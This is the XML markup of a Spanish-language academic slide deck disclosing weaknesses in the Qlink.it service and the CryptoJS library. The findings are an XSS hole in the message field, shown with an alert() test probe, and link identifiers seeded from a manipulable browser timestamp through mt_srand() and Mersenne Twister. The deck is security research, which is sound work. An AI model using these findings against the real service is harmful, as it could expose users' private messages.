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5"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="335" r:id="rId4"/>
    <p:sldId id="317" r:id="rId5"/>
    <p:sldId id="336" r:id="rId6"/>
    <p:sldId id="329" r:id="rId7"/>
    <p:sldId id="340" r:id="rId8"/>
    <p:sldId id="339" r:id="rId9"/>
    <p:sldId id="338" r:id="rId10"/>
    <p:sldId id="351" r:id="rId11"/>
    <p:sldId id="354" r:id="rId12"/>
    <p:sldId id="353" r:id="rId13"/>
    <p:sldId id="352" r:id="rId14"/>
    <p:sldId id="358" r:id="rId15"/>
    <p:sldId id="359" r:id="rId16"/>
    <p:sldId id="357" r:id="rId17"/>
    <p:sldId id="361" r:id="rId18"/>
    <p:sldId id="369" r:id="rId19"/>
    <p:sldId id="368" r:id="rId20"/>
    <p:sldId id="371" r:id="rId21"/>
    <p:sldId id="372" r:id="rId22"/>
    <p:sldId id="373" r:id="rId23"/>
    <p:sldId id="360" r:id="rId24"/>
    <p:sldId id="356" r:id="rId25"/>
    <p:sldId id="355" r:id="rId26"/>
    <p:sldId id="342" r:id="rId27"/>
    <p:sldId id="370" r:id="rId28"/>
    <p:sldId id="337" r:id="rId29"/>
    <p:sldId id="374" r:id="rId30"/>
    <p:sldId id="375" r:id="rId31"/>
    <p:sldId id="377" r:id="rId32"/>
    <p:sldId id="376" r:id="rId33"/>
    <p:sldId id="378" r:id="rId34"/>
  </p:sldIdLst>
  <p:sldSz cx="24377650" cy="13716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6" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="41" d="100"/>
          <a:sy n="41" d="100"/>
        </p:scale>
        <p:origin x="-763" y="-115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B9969-A957-41AF-A7BE-B4CE0D6725AF}" type="datetimeFigureOut">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:pPr/>
              <a:t>09/10/2017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534988" y="754063"/>
            <a:ext cx="6702425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519D3-EB63-4CBE-905F-2E822B3FB90F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519D3-EB63-4CBE-905F-2E822B3FB90F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6" name="35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37" name="36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4" name="73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75" name="74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2" name="111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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="113" name="112 Imagen"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="email"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3593520" y="-360"/>
            <a:ext cx="17190000" cy="13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218600" y="547200"/>
            <a:ext cx="21939480" cy="10616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13715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2490920" y="716436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2490920" y="0"/>
            <a:ext cx="1189584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7164360"/>
            <a:ext cx="24377400" cy="6542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 rot="16200000">
            <a:off x="22156560" y="663840"/>
            <a:ext cx="607320" cy="523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21704760" y="668160"/>
            <a:ext cx="1636560" cy="4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B208B50C-5B4E-4EF1-B099-3A5F04BC9773}" type="slidenum"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pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>‹Nº›</a:t>
            </a:fld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  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24377400" cy="13715640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="182880" tIns="91440" rIns="182880" bIns="9144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Seventh Outline Level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spc="-1">
                <a:latin typeface="Lato Light"/>
              </a:rPr>
              <a:t>Click to edit the title text format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 rot="16200000">
            <a:off x="22156560" y="663840"/>
            <a:ext cx="607320" cy="523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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="21704760" y="668160"/>
            <a:ext cx="1636560" cy="4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4EC44DF4-EF95-4BA2-99C4-4E76E5C4C02C}" type="slidenum"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pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>‹Nº›</a:t>
            </a:fld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  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spc="-1">
                <a:latin typeface="Lato Light"/>
              </a:rPr>
              <a:t>Click to edit the title text format</a:t>
            </a:r>
            <a:endParaRPr/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1218600" y="3209400"/>
            <a:ext cx="21939480" cy="7954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4800" spc="-1">
                <a:latin typeface="Montserrat Hairline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Montserrat Hairline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200" spc="-1">
                <a:latin typeface="Montserrat Hairline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Montserrat Hairline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 rot="16200000">
            <a:off x="22156560" y="663840"/>
            <a:ext cx="607320" cy="523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21704760" y="668160"/>
            <a:ext cx="1636560" cy="4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82880" tIns="91440" rIns="182880" bIns="91440"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{C4F680D0-376A-4AB8-806C-BD2BC30AFA94}" type="slidenum"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pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" sz="18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ntserrat Light"/>
                <a:ea typeface="Montserrat Light"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r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5862680" y="0"/>
            <a:ext cx="8514720" cy="13715640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="182880" tIns="91440" rIns="182880" bIns="9144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600" spc="-1">
                <a:latin typeface="Montserrat Hairline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600" spc="-1">
                <a:latin typeface="Montserrat Hairline"/>
              </a:rPr>
              <a:t>Seventh Outline Level</a:t>
            </a:r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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1218600" y="547200"/>
            <a:ext cx="21939480" cy="228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3600" spc="-1">
                <a:latin typeface="Lato Light"/>
              </a:rPr>
              <a:t>Click to edit the title text format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qlink.it/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5833" t="12963" r="65417" b="78889"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2519891" y="11790680"/>
            <a:ext cx="6629400" cy="162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 descr="C:\Users\Ariel\Desktop\tmp-proyecto\ps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94225" y="9220200"/>
            <a:ext cx="4267200" cy="426720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17917" t="14444" r="43750" b="72223"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2291291" y="9592476"/>
            <a:ext cx="9287934" cy="1817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163.10.22.64/wp-content/uploads/2017/02/logo-cacic-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8425" y="914400"/>
            <a:ext cx="9144000" cy="1833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6 CuadroTexto"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377825" y="3725724"/>
            <a:ext cx="23545800" cy="503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hangingPunct="0"/>
            <a:r>
              <a:rPr lang="es-AR" sz="7200" b="1" dirty="0" smtClean="0"/>
              <a:t>Posibles problemas en Qlink.it y librería </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="7200" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>CryptoJS</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="7200" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" hangingPunct="0"/>
            <a:endParaRPr lang="es-AR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" hangingPunct="0"/>
            <a:endParaRPr lang="es-AR" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="es-AR" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Antonio Castro Lechtaler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="3200" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="3200" dirty="0" smtClean="0"/>
              <a:t>, Marcelo Cipriano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="3200" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="3200" dirty="0" smtClean="0"/>
              <a:t>, Edith García</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="3200" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="3200" dirty="0" smtClean="0"/>
              <a:t>, Pablo Lázaro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="3200" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="3200" dirty="0" smtClean="0"/>
              <a:t>, Julio Liporace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="3200" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="3200" dirty="0" smtClean="0"/>
              <a:t>, Eduardo Malvacio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="3200" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="3200" dirty="0" smtClean="0"/>
              <a:t>, Ariel Maiorano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="3200" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>1,2</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" hangingPunct="0"/>
            <a:endParaRPr lang="es-AR" sz="2800" baseline="30000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" hangingPunct="0"/>
            <a:endParaRPr lang="es-AR" sz="2800" baseline="30000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" smtClean="0"/>
              <a:t> Grupo de Investigación en Criptografía y Seguridad Informática (GICSI), Instituto Universitario del Ejército (IUE);</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" smtClean="0"/>
              <a:t> Dirección de Gestión Tecnológica (DGT), Policía de Seguridad Aeroportuaria (PSA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="es-AR" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>acastro,marcelocipriano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>}@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>est.iue.edu.ar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>, {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>editxgarcia,edumalvacio,jcliporace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>}@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>, {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>plazaro,amaiorano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>}@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>psa.gob.ar</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2800" b="1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Trabajo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presentado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(iii)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6341939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70982" y="6401038"/>
            <a:ext cx="14094467" cy="14403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dirty="0" smtClean="0"/>
              <a:t>Vulnerabilidad del tipo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>XXS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> (Cross </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>Site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> Scripting)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="4800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6548519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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2400">
            <a:off x="1370981" y="7470577"/>
            <a:ext cx="21942643" cy="14403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dirty="0" smtClean="0"/>
              <a:t>Operaciones criptográficas: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>Estimación de fecha/hora de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="4800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>qlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t> anterior</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="4800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="544320" y="7615319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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2400">
            <a:off x="1370981" y="8615865"/>
            <a:ext cx="21790720" cy="14403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dirty="0" smtClean="0"/>
              <a:t>Operaciones criptográficas: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>Obtención de "número DN" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="4800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="544320" y="876066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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2400">
            <a:off x="1370981" y="9682107"/>
            <a:ext cx="20190680" cy="14403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dirty="0" smtClean="0"/>
              <a:t>Operaciones criptográficas: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>Problemas heredados desde </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>CryptoJS</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="4800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="544320" y="982746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13 CuadroTexto"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454025" y="4142999"/>
            <a:ext cx="2095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/>
              <a:t>Posibles problemas en Qlink.it</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="9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Vulnerabilidad del tipo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>XXS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> (Cross </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>Site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> Scripting)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Aunque se utilizan funciones </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> para el filtrado de campos de entrada a completar por el usuario al generar un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>qlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> –por ejemplo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>filterXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>() y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>escapeHtmlEntities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>()-, para el campo que contiene el mensaje, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>la entrada parece no verificarse o “filtrarse” correctamente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r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Vulnerabilidad del tipo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>XXS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> (Cross </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>Site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> Scripting) (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>ii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr hangingPunct="0"/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punto_2_1.py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mensaje del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: Mensaje de prueba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mensaje para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alert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(): Prueba XSS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: http://qlink/two/L3rpir1tqRPV8DUzVSPPGu#123456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$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endParaRPr lang="es-AR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Vulnerabilidad del tipo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>XXS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> (Cross </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>Site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> Scripting) (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>iii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r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1 Imagen" descr="11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9825" y="5867400"/>
            <a:ext cx="14325600" cy="754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Operaciones criptográficas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> 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js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/application.js</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pP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app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Models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Utils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/RandomHasher.php </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pP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app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Controllers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/LandingNewController.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-AR" sz="48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s-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Los primeros 10 caracteres, por ejemplo: http://qlink/two/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>XXXXXXXXXX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>... Son generados (no exclusivamente) en base a un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>timestamp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> al milisegundo -resultado de la función </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> Date().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>getTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>()- enviado por el navegador. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>Puede manipularse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>. Se usará en el próximo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>qlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>, el valor luego es sumado al </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>timestamp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t> del servidor, a la cantidad de microsegundos * 100.000, y usado como semilla de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>mt_srand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" sz="4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Char char="q"/>
            </a:pPr>
            <a:endParaRPr lang="es-AR" sz="4800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:endParaRPr lang="es-AR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68481" y="4346273"/>
            <a:ext cx="8232549" cy="8604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Operaciones criptográficas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Uso de funciones basadas en el generador conocido como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Mersenne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Twister</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>, no son aptas para utilizarse cuando existe la necesidad de números aleatorios para operaciones criptográficas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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 l="2917" t="7778" r="27917" b="5556"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9674225" y="3657600"/>
            <a:ext cx="13944600" cy="982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Operaciones criptográficas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Método </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>Math.Random</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>“NO provee números</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Aleatorios con seguridad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
